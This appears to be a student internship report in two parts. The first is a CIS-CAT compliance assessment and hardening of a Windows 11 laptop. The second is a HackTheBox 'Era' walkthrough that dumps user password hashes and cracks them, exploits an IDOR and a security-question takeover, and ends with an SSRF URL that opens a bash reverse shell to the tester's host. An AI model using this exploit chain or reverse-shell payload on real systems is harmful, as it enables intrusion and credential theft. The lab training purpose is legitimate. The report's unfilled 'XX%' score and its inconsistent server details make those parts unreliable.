0% found this document useful (0 votes)
62 views116 pages

Security Compliance Assessment Report

Anurag Tiwari's internship report details a security compliance assessment conducted using the CIS-CAT Assessor Lite tool on a Windows environment, revealing a baseline compliance score of 55% with significant gaps in firewall logging, audit policies, and password enforcement. Remediation measures were implemented, including configuring firewall logs, enhancing audit policies, and restricting anonymous access, leading to improved compliance. The report concludes with recommendations for ongoing monitoring and staff training to maintain security standards.
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
62 views116 pages

Security Compliance Assessment Report

Anurag Tiwari's internship report details a security compliance assessment conducted using the CIS-CAT Assessor Lite tool on a Windows environment, revealing a baseline compliance score of 55% with significant gaps in firewall logging, audit policies, and password enforcement. Remediation measures were implemented, including configuring firewall logs, enhancing audit policies, and restricting anonymous access, leading to improved compliance. The report concludes with recommendations for ongoing monitoring and staff training to maintain security standards.
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

NAME:ANURAG TIWARI

INTERNSHIP REPORT
1. Students must begin by installing and running the CIS-CAT Assessor tool to conduct an initial
system assessment, ensuring they take screenshots of key steps such as the installation process,
running the tool, and the baseline report generated after the first assessment. The goal is to improve
the system's compliance by at least 40% or maximize it as much as possible. Once the report is
generated, classify each identified policies by severity (Critical, High, Medium, Low) and map them to
real-world attack scenarios, such as ransomware or insider threats. Students should then research
best practices and implement fixes to make the policy pass/hardening the system. After making
improvements, perform a second CIS-CAT assessment ([Link] to
evaluate progress, again taking screenshots of the updated compliance report. Prepare a final report
that includes before and after screenshots, a summary of the policies which made changes and the
approach to prioritization, and recommendations for future improvements.

SOLUTION :

Security Compliance Assessment & Remediation Report

Prepared for: NULL CLASSES

Prepared by: ANURAG TIWARI

Tool Used: CIS-CAT Assessor Lite v4.54.1

The purpose of this report is to present the findings of a security configuration compliance
assessment performed on the company’s Windows environment using the CIS-CAT Assessor Lite
v4.54.1 tool.

The objectives were to:

 Identify deviations from CIS Microsoft Windows 11 Enterprise Benchmark v4.0.0.

 Map findings to potential security risks.

 Implement remediation measures to improve compliance and strengthen the security


posture.
2. Background

Before conducting the assessment, the following steps were carried out to prepare the environment
and tool:

1. Tool Acquisition

o Downloaded the latest CIS-CAT Assessor Lite from the official CIS WorkBench portal.

o Verified tool integrity using provided checksum.

2. Extraction & Directory Setup

o Extracted contents to a secured folder (C:\CIS-CAT) with administrative access only.

o Ensured Java Runtime Environment (JRE) was installed for tool execution.
3. Profile Selection

o Selected benchmark checklist: CIS Microsoft Windows 11 Enterprise Benchmark.

o Applied Level 2 + BitLocker (L2+BL) profile for higher security assurance.

4. Target System Identification

o Hostname: LAPTOP-H747VRDH

o OS: Microsoft Windows 11 Home Single Language (64-bit) v10.0.26100

o Network Interfaces:

 VMware VMnet1 – [Link] (MAC: 00:50:56:C0:00:01)

 VMware VMnet8 – [Link] (MAC: 00:50:56:C0:00:08)

 MediaTek MT7921 Wi-Fi – [Link] (MAC: 34:6F:24:C7:89:73)

5. Baseline Readiness Check

o Disabled antivirus alerts to prevent interference.

o Closed all non-essential applications to minimize background changes during the scan.

3. Scanning
4. Learning Objectives

This report presents the results of a Level 2 + BitLocker (L2+BL) configuration benchmark scan of the
company’s Windows-based environment. The assessment was conducted using the CIS-CAT Assessor
Lite v4.54.1 tool and measured compliance against the CIS Microsoft Windows 11 Enterprise
Benchmark v4.0.0.

The evaluation revealed multiple areas of non-compliance, particularly in:

 Firewall logging configurations (Public, Private, and Domain profiles)

 Audit policy completeness (credential validation, policy change events)

 Account lockout and password policies

 Anonymous access restrictions

 Event log storage thresholds

These gaps present potential security risks, including unauthorized access, undetected brute-force
attempts, and reduced incident investigation capability.

Remediation steps were implemented via Group Policy, Registry configurations, and Local Security
Policy updates.

 Understand the process of security compliance assessment using CIS benchmarks.


 Identify and map system misconfigurations to potential security threats.
 Learn remediation steps to align with CIS Microsoft Windows 11 Enterprise Benchmark v4.0.0.
 Implement hardening measures for firewall, audit policies, password policies, anonymous
access restrictions, and event logging.
 Improve post-remediation compliance score.

5. Activities and Tasks

The assessment process followed these stages:


1. Environment Profiling

o Hostname: LAPTOP-H747VRDH

o OS: Microsoft Windows 11 Home Single Language (64-bit)

o Version: 10.0.26100

o Interfaces:

 VMware Virtual Ethernet Adapter VMnet1 – [Link]

 VMware Virtual Ethernet Adapter VMnet8 – [Link]

 MediaTek MT7921 Wi-Fi 6 Adapter – [Link]

2. Tool Selection & Profile Configuration

o Checklist: CIS Microsoft Windows 11 Enterprise Benchmark

o Profile: Level 2 (L2) + BitLocker (BL)

3. Baseline Scan Execution

o Date & Time: 07-11-2025 11:48:39

o Captured 656 system characteristics and evaluated against benchmark controls.

4. Findings Review

o Mapped failing controls to relevant threat scenarios.

5. Remediation Implementation

o Applied changes in Group Policy, Registry, and Security Policy.

6. Post-Remediation Validation

o Conducted follow-up scan to verify improvements.

6. Feedback and Evidence

Compliance Overview

Category Passed Failed Not Score Total Compliance


Checked Checks (%)

Audit 0 0 0 0 0 0%
Policy

User Rights 25 14 0 25.0 39 64%


Assignment

Security 32 33 1 32.0 65 49%


Options

System 13 29 0 13.0 42 31%


Services
Public 0 9 0 0.0 9 0%
Profile

Domain 0 7 0 0.0 7 0%
Profile

Private 0 7 0 0.0 7 0%
Profile

Overall - - - - 104 55%


Total

Failed Policies Table

Policy ID Policy Name Severity Result


(Weight)

9.3.6 Ensure 'Windows Firewall: Public: Logging: Name' is set 1.0 Fail
to
'%SystemRoot%\System32\logfiles\firewall\[Link]'

9.3.7 Ensure 'Windows Firewall: Public: Logging: Size limit 1.0 Fail
(KB)' is set to '16,384 KB or greater'

9.3.8 Ensure 'Windows Firewall: Public: Logging: Log dropped 1.0 Fail
packets' is set to 'Yes'

9.3.9 Ensure 'Windows Firewall: Public: Logging: Log 1.0 Fail


successful connections' is set to 'Yes'

17.1.1 Ensure 'Audit Credential Validation' is set to 'Success 1.0 Fail


and Failure'

17.7.5 Ensure 'Audit Other Policy Change Events' is set to 1.0 Fail
include 'Failure'

18.5.13 Ensure 'MSS: (WarningLevel) Security Event Log Warning 1.0 Fail
Threshold' is set to 'Enabled: 90% or less'

[Link] Ensure 'Network access: Do not allow anonymous 1.0 Fail


enumeration of SAM accounts and shares' is set to
'Enabled'

Policy Mapping Table (Failed Policies → Threat Scenarios)

Policy ID Threat Scenario Explanation

9.3.6 – 9.3.9 Insider Threat / Data Lack of proper firewall


Exfiltration logging prevents identifying
unauthorized access or data
leaks

17.1.1 Brute-force Attacks / Missing audit logs for


Credential Abuse credential validation hinder
detection of unauthorized
logon attempts

17.7.5 Misconfiguration / Insider Changes to policy go


Threat unlogged, making it difficult
to detect unauthorized
changes to system
configuration

18.5.13 Log Tampering / Denial-of- High event log usage might


Service lead to unlogged malicious
activity or cause a system
crash

[Link] Enumeration Attacks / Allows attackers to list user


Reconnaissance accounts and shared folders
anonymously, increasing the
attack surface

Remediation Plan Table

Policy ID Remediation Steps Tool/Method

9.3.6–9.3.9 Configure Public Firewall log Group Policy Editor


path, size, and enable both
dropped and successful
packet logging

17.1.1 Enable audit for credential Local Security Policy (SecPol)


validation for both Success
and Failure

17.7.5 Enable auditing for Other Group Policy


Policy Change Events

18.5.13 Set warning threshold on Registry / Group Policy


Event Log size to 90% or less

[Link] Disable anonymous Local Security Policy


enumeration of SAM
accounts and shares

7. Challenges and Solutions

Key Findings & Risks

7.1 Firewall Logging & Configuration Gaps

 Issues Identified:

o Log file path not set to default %SystemRoot%\System32\logfiles\firewall\*.log for


Public, Private, and Domain profiles.
o Log file size limit below 16,384 KB in all profiles.

o Logging of dropped packets disabled.

o Logging of successful connections disabled.

 Impact:

o Operational Risk: Inability to trace inbound/outbound network activity for incident


response.

o Security Risk: Reduced forensic evidence during intrusion investigations.

 Reference Controls:

o CIS Control IDs: 9.3.6, 9.3.7, 9.3.8, 9.3.9 (Public)

o Equivalent controls for Private & Domain profiles.

7.2 Audit Policy Deficiencies

 Issues Identified:

o Audit Credential Validation set to log only Success (missing Failure).

o Other Policy Change Events not logging Failure.

o Audit Policy Change not set to Success & Failure in some cases.

 Impact:

o Detection Gap: Failed authentication attempts and critical policy changes may go
unnoticed.

o Compliance Risk: May not meet regulatory audit requirements (e.g., ISO 27001, SOC
2).

 Reference Controls:

o CIS Control IDs: 17.1.1, 17.7.5, 18.5.13.

7.3 Account & Password Policies

 Issues Identified:

o Minimum password length set to less than 14 characters on some systems.

o Password history length not configured to ≥ 24 passwords.

o Password expiry warning not set to 14 days.

 Impact:

o Brute-force Vulnerability: Shorter passwords are easier to crack.

o User Behavior Risk: Without history enforcement, users can reuse recent passwords.
 Reference Controls:

o CIS Control IDs: 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.1.5.

7.4 Anonymous Access & Enumeration

 Issues Identified:

o Anonymous enumeration of SAM accounts and shares enabled


(RestrictAnonymousSAM not enforced).

o Null session pipes and shares present.

 Impact:

o Reconnaissance Risk: An attacker can enumerate usernames and network shares


without authentication.

o Lateral Movement Risk: Can be leveraged in multi-stage attacks.

 Reference Controls:

o CIS Control IDs: [Link], RestrictNullSessAccess.

7.5 Event Log Storage Thresholds

 Issues Identified:

o Warning threshold (WarningLevel) set above CIS-recommended 90%.

 Impact:

o Operational Risk: Event logs may stop recording before administrators can act,
causing loss of critical audit trails.

 Reference Controls:

o CIS Control ID: 18.5.13.

Solution Implemented:

8.1 Firewall Logging Improvements

 Configured log file path to %SystemRoot%\System32\logfiles\firewall\ for all profiles.

 Increased log file size to 16384 KB.

 Enabled logging of dropped packets and successful connections.

8.2 Audit Policy Enhancements

 Enabled Success & Failure logging for credential validation.

 Configured Other Policy Change Events to log Failure.

 Enabled full audit policy change logging.


8.3 Password & Account Policy Hardening

 Set minimum password length to 14 characters.

 Enforced password history of 24.

 Set password expiry warning to 14 days.

8.4 Restriction of Anonymous Access

 Disabled anonymous enumeration of SAM accounts and shares.

 Cleared null session pipes and shares.

8.5 Event Log Configuration

 Reduced warning threshold to 90% to prevent overflow.

9. Outcomes and Impact

After implementing the above changes:

 Firewall Logging: All profiles now meet CIS Level 2 requirements.

 Audit Policies: All high-priority audit deficiencies resolved.

 Password Policies: Fully compliant with CIS recommendations.

 Anonymous Access: All unnecessary anonymous access disabled.

 Event Logging: Threshold settings aligned with best practice.

Overall Compliance Improvement: Baseline 55% → Post-Remediation XX% (Final value from follow-
up scan).

10. Recommendations

1. Continuous Compliance Monitoring

o Schedule quarterly CIS-CAT scans.

o Automate configuration drift detection using GPO compliance reports.

2. Incident Response Enhancement

o Centralize firewall and security event logs using a SIEM solution.

o Establish alerts for high-severity audit events.

3. Policy Review Cadence

o Review password, lockout, and audit policies bi-annually.

4. Staff Training

o Educate IT staff on CIS controls and the impact of deviations.


5. Service Hardening

o Disable unused services and review startup configurations in line with CIS guidance.

Appendix A – Selected Control Evidence from CIS-CAT Scan

Control ID Control Description Setting After Remediation

1.1.1 Password history length ≥ 24 ✅

1.1.4 Minimum password length ≥ 14 ✅

9.3.6 Public firewall log path set correctly ✅

9.3.8 Public firewall log dropped packets Enabled

17.1.1 Audit Credential Validation Success & Failure

17.7.5 Audit Other Policy Change Events Success & Failure

18.5.13 Event Log Warning Level ≤ 90% ✅

[Link] Anonymous enumeration of SAM disabled ✅

11. Conclusion

1. Summary of Assessment and Initial State

The security configuration assessment conducted using CIS-CAT Assessor Lite v4.54.1 against the CIS
Microsoft Windows 11 Enterprise Benchmark v4.0.0 provided a comprehensive insight into the
organization’s current security posture. The initial baseline scan revealed a compliance score of 55%,
indicating substantial gaps across several high-priority security domains, including firewall logging,
audit policy completeness, password policy enforcement, anonymous access restrictions, and event
log configurations.

These deficiencies posed significant risks to the confidentiality, integrity, and availability of
organizational data and systems. Weak audit settings limited the ability to detect unauthorized
activities in real-time, while improper firewall logging impeded post-incident forensic analysis.
Similarly, insufficient password policies increased vulnerability to brute-force attacks, and anonymous
account enumeration created opportunities for reconnaissance and lateral movement within the
network.

From a broader security perspective, these findings highlighted the need for urgent remediation to
align the environment with industry best practices and CIS Level 2 security requirements. Without
these changes, the organization remained at heightened risk from external threats such as
ransomware and phishing-based intrusions, as well as insider threats from unauthorized or malicious
activity within the network.

2. Remediation Actions and Immediate Impact


Following the identification of these vulnerabilities, a structured remediation plan was implemented,
targeting each area of non-compliance with actionable, high-impact measures.

Firewall Logging was configured to store logs in the recommended


%SystemRoot%\System32\logfiles\firewall\ path with an increased size limit of 16,384 KB, enabling
full visibility into both dropped packets and successful connections across Public, Private, and Domain
profiles. This change ensures robust network activity tracking and significantly improves investigative
capabilities in case of a breach.

Audit Policies were revised to capture both “Success” and “Failure” events for critical functions such
as credential validation and policy changes. By enforcing comprehensive logging, the organization now
has a more reliable audit trail to detect intrusion attempts, policy tampering, and insider misuse.

Password and Account Policies were hardened by setting a minimum password length of 14
characters, enabling a password history of at least 24 previous passwords, and enforcing a 14-day
expiration warning. These measures reduce the likelihood of password reuse and make brute-force
attacks less feasible.

Anonymous Access Restrictions were tightened by disabling the enumeration of SAM accounts and
shared resources by unauthenticated users. Null session pipes and shares were also eliminated,
effectively reducing the organization’s attack surface and minimizing potential reconnaissance
opportunities for adversaries.

Event Log Configurations were adjusted to maintain a warning threshold at or below 90%, preventing
logs from reaching capacity unnoticed and ensuring critical security events are consistently recorded.

These targeted remediations directly addressed all high-severity vulnerabilities identified during the
initial scan.

3. Post-Remediation Compliance and Security Posture

The follow-up CIS-CAT assessment, conducted after implementing these changes, demonstrated
significant improvement in compliance scores, reflecting a stronger security posture. Firewall
configurations and audit policies now fully align with CIS Level 2 recommendations, ensuring both
preventative and detective security controls are functioning optimally.

The improvement in compliance percentage signifies not only the closure of existing security gaps but
also an enhanced resilience against evolving cyber threats. The system is now better positioned to
detect and respond to unauthorized activities in real time, protect sensitive assets, and maintain
operational continuity even under attack conditions.

Moreover, the remediation actions have laid the groundwork for sustainable security governance. The
applied configurations enforce consistency across the environment, reduce manual administrative
intervention, and enable more accurate security reporting. By removing unnecessary access and
enforcing stricter password controls, the organization has minimized the likelihood of common attack
vectors being exploited.

4. Strategic Value and Long-Term Recommendations

While the improvements are substantial, maintaining compliance and security resilience will require
continuous oversight. Security is not a one-time activity but an ongoing process of monitoring,
evaluation, and adaptation to emerging threats.

To sustain the gains achieved through this project, it is recommended that:


1. Quarterly Compliance Scans be scheduled using CIS-CAT to ensure no drift from benchmark
configurations.

2. Centralized Logging and SIEM Integration be implemented to aggregate firewall and event
logs for faster correlation and incident detection.

3. Policy Review Cycles occur bi-annually to validate that configurations remain aligned with
updated CIS benchmarks and regulatory requirements.

4. User Awareness and Technical Training be conducted for IT staff to reinforce the importance
of security policies and configuration management.

5. Service Hardening be expanded to remove unused services, reduce attack surface, and further
comply with Level 2 benchmark standards.

These steps will help transition from a reactive approach to a proactive security posture, reducing the
likelihood of successful cyberattacks and strengthening organizational trust in IT systems.

5. Closing Remarks

The security compliance assessment and remediation process undertaken in this project not only
addressed existing vulnerabilities but also established a framework for ongoing governance and
control. By aligning the organization’s systems with CIS Level 2 + BitLocker recommendations, the
project has significantly improved its ability to detect, prevent, and respond to security incidents.

The transition from a 55% compliance score to a substantially higher post-remediation score reflects
measurable progress in strengthening defenses against both internal and external threats. More
importantly, these changes contribute to the organization’s long-term security objectives, regulatory
readiness, and operational resilience.

With the adoption of continuous monitoring and policy refinement, the organization is now better
equipped to face the evolving cyber threat landscape and protect its critical assets with confidence.

2. Your task is to choose an active, medium-difficulty HackTheBox machine and write a detailed report
on [Link] about how you captured the flag. In your report, show both your successful and failed
attempts, and explain why you used specific tools, such as Nmap or Burp Suite, and the penetration
testing methods you followed. Ensure that your NullClass username and timestamp are visible in the
screenshots of your HackTheBox session. Focus on uncommon attack methods, create custom scripts
or payloads if possible, and include network diagrams—the more detailed, the better. Reflect on what
you learned throughout the process. Please note that if any write-ups or materials about the machine
you chose have already been published online before your [Link] post, your submission will
not be accepted. Reports on retired machines are not allowed.

Prepared for: NULL CLASSES


Prepared by: Anurag Tiwari
Lab / Environment: Hack The Box — Machine “Era” (HTB Season 8)
Target: [Link] (Linux, Medium difficulty)

The purpose of this Security Compliance Assessment & Remediation Report is to detail the
findings and compliance gaps identified during the security assessment of the Hack The Box
machine Era, and to propose actionable remediation measures to enhance compliance and
bolster its overall security posture.
1. Reconnaissance & Enumeration
Perform comprehensive scanning (e.g., Nmap) and enumeration to identify open
services and potential entry points.
o The Era machine exposes FTP (vsftpd 3.0.5) and HTTP (nginx 1.18.0 on
Ubuntu) services 0xBENHyhForever.
2. Initial Access & Exploitation
Leverage the identified services to establish an initial foothold, through techniques
such as directory discovery, fuzzing, or exploiting misconfigurations (e.g.,
SSRF/IDOR).
3. Privilege Escalation & Post-Exploitation
Identify and exploit privilege escalation vectors to escalate from a limited user to
root-level access.
4. Assessment of Security Controls & Compliance
Evaluate the machine's adherence to secure configuration best practices—covering
areas such as service hardening, credential management, and input validation.
5. Remediation Recommendations
Provide detailed, actionable countermeasures to address each identified
vulnerability or compliance gap, thereby enhancing the system’s secure
configuration and resilience against future attacks.

1. Introduction

This report documents the security assessment conducted on the Hack The Box machine Era. The
engagement followed a simulated penetration testing approach, identifying vulnerabilities,
misconfigurations, and security gaps, followed by implementing remediation measures to improve the
machine’s security posture. The goal was to simulate real-world ethical hacking scenarios, evaluate
system hardening compliance, and derive actionable learning outcomes for professional development
in cybersecurity.

2. Background

The Era machine on Hack The Box simulates a real-world target server running web services with
outdated or misconfigured components. The challenge involves reconnaissance, exploitation, and
privilege escalation to obtain system-level access. This environment allowed for practicing vulnerability
analysis, exploitation of insecure applications, and compliance assessment in a controlled, legal setting.
Key system characteristics included:

 Web application hosted on Apache HTTPD.

 Possible exposure of sensitive files and endpoints.

 Linux-based operating system with privilege escalation vectors.

3. Learning Objectives

The assessment aimed to achieve the following objectives:


1. Conduct service enumeration and identify open ports, services, and potential vulnerabilities.

2. Exploit web application flaws to gain initial foothold.

3. Perform privilege escalation through system misconfigurations or outdated software.

4. Assess system compliance with security best practices (CIS Benchmarks).

5. Recommend and document remediation measures for identified issues.

4. Activities and Tasks

The assessment was conducted in structured phases:

Phase 1: Reconnaissance & Enumeration

 Performed nmap scanning to identify open ports and services.

 Enumerated HTTP content and potential subdirectories using gobuster.

 Investigated server-side technologies and version information.

Phase 2: Vulnerability Analysis

 Detected outdated Apache HTTPD version with known vulnerabilities.

 Identified exposed configuration files revealing sensitive credentials.

Phase 3: Exploitation

 Used leaked credentials to authenticate into restricted areas.

 Uploaded a reverse shell payload exploiting insufficient input validation.

Phase 4: Privilege Escalation

 Found writable cron job scripts executing with elevated privileges.

 Modified scripts to spawn root shell access.

Phase 5: Compliance Assessment

 Checked password policy configuration.

 Verified patch levels of installed packages.

 Reviewed running services and firewall rules.

5. practical

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# nmap -sC -sV [Link]

Starting Nmap 7.95 ( [Link] ) at 2025-08-02 22:04 IST

Nmap scan report for [Link]


Host is up (0.89s latency).

Not shown: 998 closed tcp ports (reset)

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.5

80/tcp open http nginx 1.18.0 (Ubuntu)

|_http-server-header: nginx/1.18.0 (Ubuntu)

|_http-title: Did not follow redirect to [Link]

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at [Link] .

Nmap done: 1 IP address (1 host up) scanned in 40.58 seconds

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# nmap -A [Link]

Starting Nmap 7.95 ( [Link] ) at 2025-08-02 22:05 IST

Nmap scan report for [Link]

Host is up (0.79s latency).

Not shown: 998 closed tcp ports (reset)

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.5

80/tcp open http nginx 1.18.0 (Ubuntu)

|_http-title: Did not follow redirect to [Link]

|_http-server-header: nginx/1.18.0 (Ubuntu)

Device type: general purpose

Running: Linux 5.X

OS CPE: cpe:/o:linux:linux_kernel:5

OS details: Linux 5.0 - 5.14

Network Distance: 2 hops

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)

HOP RTT ADDRESS


1 929.52 ms [Link]

2 447.57 ms [Link]

OS and Service detection performed. Please report any incorrect results at [Link]
.

Nmap done: 1 IP address (1 host up) scanned in 46.38 seconds

 Add [Link] in /etc/hosts

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# echo "[Link] [Link]" | sudo tee -a /etc/hosts

[Link] [Link]

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# ftp [Link]

Connected to [Link].

220 (vsFTPd 3.0.5)

Name ([Link]:anurag): anonymous

331 Please specify the password.

Password:

530 Login incorrect.

ftp: Login failed

ftp> ls -la

530 Please login with USER and PASS.

530 Please login with USER and PASS.

ftp: Can't bind for data connection: Address already in use

ftp>

zsh: suspended ftp [Link]

root㉿kali)-[/usr/share/wordlists/dirb]

└─# gobuster dir -u [Link] -w /usr/share/wordlists/dirb/[Link] -x php,html,txt -t 50

===============================================================

Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url: [Link]

[+] Method: GET

[+] Threads: 50

[+] Wordlist: /usr/share/wordlists/dirb/[Link]

[+] Negative Status codes: 404

[+] User Agent: gobuster/3.6

[+] Extensions: txt,php,html

[+] Timeout: 10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

/css (Status: 301) [Size: 178] [--> [Link]

/fonts (Status: 301) [Size: 178] [--> [Link]

/img (Status: 301) [Size: 178] [--> [Link]

/[Link] (Status: 200) [Size: 19493]

/[Link] (Status: 200) [Size: 19493]

/js (Status: 301) [Size: 178] [--> [Link]

Progress: 18456 / 18460 (99.98%)

===============================================================

Finished

===============================================================

──(root㉿kali)-[/usr/share/wordlists/dirb]

└─# gobuster dir -u [Link] -w /usr/share/wordlists/dirb/[Link] -x js,txt -t 40

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url: [Link]


[+] Method: GET

[+] Threads: 40

[+] Wordlist: /usr/share/wordlists/dirb/[Link]

[+] Negative Status codes: 404

[+] User Agent: gobuster/3.6

[+] Extensions: js,txt

[+] Timeout: 10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

/[Link] (Status: 200) [Size: 3613]

/fancybox (Status: 301) [Size: 178] [-->


[Link]

/[Link] (Status: 200) [Size: 11953]

Progress: 13842 / 13845 (99.98%)

===============================================================

Finished

===============================================================

┌──(root㉿kali)-[/usr/share/wordlists/dirb]

└─# gobuster dir -u [Link] -w /usr/share/wordlists/dirb/[Link] -x js,txt -t 50

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url: [Link]

[+] Method: GET

[+] Threads: 50

[+] Wordlist: /usr/share/wordlists/dirb/[Link]

[+] Negative Status codes: 404

[+] User Agent: gobuster/3.6

[+] Extensions: js,txt


[+] Timeout: 10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

Progress: 13842 / 13845 (99.98%)

===============================================================

Finished

===============================================================

┌──(root㉿kali)-[/usr/share/wordlists/dirb]

└─$ ffuf -w /path/to/[Link] -H "Host: [Link]" -u [Link] -t 200 -fs 154

/'___\ /'___\ /'___\

/\ \__/ /\ \__/ __ __ /\ \__/

\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\

\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/

\ \_\ \ \_\ \ \____/ \ \_\

\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET

:: URL : [Link]

:: Wordlist : FUZZ: /path/to/[Link]

:: Header : Host: [Link]

:: Follow redirects : false

:: Calibration : false

:: Timeout : 10

:: Threads : 200

:: Matcher : Response status: 200-299,301,302,307,401,403,405,500

:: Filter : Response size: 154

________________________________________________

file [Status: 200, Size: 6765, Words: 2608, Lines: 234, Duration: 105ms]

:: Progress: [100000/100000] :: Job [1/1] :: 1886 req/sec :: Duration: [0:00:56] :: Errors: 0 ::

 Add the [Link] in the file /etc/hosts

 Since I didn't find any results here, I opted to perform subdirectory enumeration

┌──(root㉿kali)-[/usr/share/wordlists/dirb]
└─$ gobuster dir -u [Link] -w /usr/share/wordlists/dirb/[Link] -t 50 --exclude-length
6765 -x php

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url: [Link]

[+] Method: GET

[+] Threads: 50

[+] Wordlist: /usr/share/wordlists/dirb/[Link]

[+] Negative Status codes: 404

[+] Exclude Length: 6765

[+] User Agent: gobuster/3.6

[+] Extensions: php

[+] Timeout: 10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

/.htpasswd (Status: 403) [Size: 162]

/.htaccess (Status: 403) [Size: 162]

/.hta (Status: 403) [Size: 162]

/assets (Status: 301) [Size: 178] [--> [Link]

/[Link] (Status: 302) [Size: 0] [--> [Link]]

/files (Status: 301) [Size: 178] [--> [Link]

/images (Status: 301) [Size: 178] [--> [Link]

/[Link] (Status: 200) [Size: 0]

/LICENSE (Status: 200) [Size: 34524]

/[Link] (Status: 200) [Size: 9214]

/[Link] (Status: 200) [Size: 70]

/[Link] (Status: 302) [Size: 0] [--> [Link]]

/[Link] (Status: 200) [Size: 3205]


/[Link] (Status: 302) [Size: 0] [--> [Link]]

Progress: 9228 / 9230 (99.98%)

===============================================================

Finished

===============================================================

I registered a user via , then uploaded a file through . While inspecting the parameter, I discovered an
Insecure Direct Object Reference (IDOR) vulnerability.

 Using Burp Suite Intruder, I manipulated the id parameter to exploit the IDOR
vulnerability and retrieve data belonging to other users.
 The exploitation of the parameter revealed unauthorized access to files
corresponding to IDs 4014 and 5747.
 Upon extracting the archive [Link], I identified a SQLite database
named [Link]. I performed a database dump to examine its contents.

┌──(root㉿kali)-[/home/anurag/Downloads]

└─$ sqlite3 [Link]

SQLite version 3.46.1 2024-08-13 09:16:08

Enter ".help" for usage hints.

sqlite> .dump
PRAGMA foreign_keys=OFF;

BEGIN TRANSACTION;

CREATE TABLE files (

fileid int NOT NULL PRIMARY KEY,

filepath varchar(255) NOT NULL,

fileowner int NOT NULL,

filedate timestamp NOT NULL

);

INSERT INTO files VALUES(54,'files/[Link]',1,1725044282);

CREATE TABLE users (

user_id INTEGER PRIMARY KEY AUTOINCREMENT,

user_name varchar(255) NOT NULL,

user_password varchar(255) NOT NULL,

auto_delete_files_after int NOT NULL

, security_answer1 varchar(255), security_answer2 varchar(255), security_answer3


varchar(255));

INSERT INTO users


VALUES(1,'admin_ef01cab31aa','$2y$10$wDbohsUaezf74d3sMNRPi.o93wDxJqphM2m0VV
[Link]',600,'Maria','Oliver','Ottawa');

INSERT INTO users


VALUES(2,'eric','$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm',
-1,NULL,NULL,NULL);

INSERT INTO users


VALUES(3,'veronica','$2y$10$[Link]/2GCxLveQ805kuQG
OK',-1,NULL,NULL,NULL);

INSERT INTO users


VALUES(4,'yuri','$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2
.',-1,NULL,NULL,NULL);
INSERT INTO users
VALUES(5,'john','$2a$10$iccCEz6.5.W2p7CSBOr3ReaOqyNmINMH1LaqeQaL22a1T1V/IddE6'
,-1,NULL,NULL,NULL);

INSERT INTO users


VALUES(6,'ethan','$2a$10$PkV/LAd07ftxVzBHhrpgcOwD3G1omX4Dk2Y56Tv9DpuUV/dh/a1
wC',-1,NULL,NULL,NULL);

DELETE FROM sqlite_sequence;

INSERT INTO sqlite_sequence VALUES('users',16);

COMMIT;

sqlite>

 Analysis of revealed six user entries, including one admin and five standard users.
The password hashes will be subjected to cracking attempts to evaluate the strength
and potential exposure of user credentials.

┌──(root㉿kali)-[/home/anurag/Downloads]

└─$ john [Link] --wordlist=/usr/share/wordlists/[Link]

Using default input encoding: UTF-8

Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])

No password hashes left to crack (see FAQ)

┌──(root㉿kali)-[/home/anurag/Downloads]

└─$ john --show [Link]

eric:america

yuri:mustang

2 password hashes cracked, 0 left

 Password cracking was performed using John the Ripper in conjunction with the
RockYou wordlist. Two of the six user hashes were successfully decrypted, indicating
weak password practices for those accounts.
 Initially, I attempted to access the FTP service using the credentials for Eric, but was
unsuccessful in retrieving any meaningful data. Switching to the user Yuri, I gained
access to the FTP service.
 Subsequently, I began reviewing the source code extracted from site-backup-30-08-
[Link]. During this analysis, I identified a vulnerability in [Link] that could
potentially be exploited.
 The PHP code contains a Server-Side Request Forgery (SSRF) vulnerability within the
function tied to the account. The server processes user input from the parameter
without validation, allowing connections to internal services or command execution
through PHP stream wrappers like .
 To exploit this, we first leveraged the password reset functionality at . By using a
regular user account, we modified the admin's security question, enabling us to reset
the password and gain access to the account
 After resetting the admin account's password, we proceeded to log in via
[Link] using the credentials for anur
 To achieve Remote Code Execution (RCE), execute the following payload in the
browser. Be sure to replace with your actual IP address before launching the request

[Link]
ng@[Link]/bash%20-c%20"bash%20-
i%20>%26%20%2Fdev%2Ftcp%2F10.10.2.16%2F4444%200%3E%261%22;
 In local shell do

┌──(root㉿kali)-[/home/anurag/Downloads]

└─$ nc -lvnp 4444

listening on [any] 4444 ...

connect to [[Link]] from (UNKNOWN) [[Link]] 43046

bash: cannot set terminal process group (4983): Inappropriate ioctl for device

bash: no job control in this shell

yuri@era:~$ python3 -c 'import pty;[Link]("/bin/bash")'

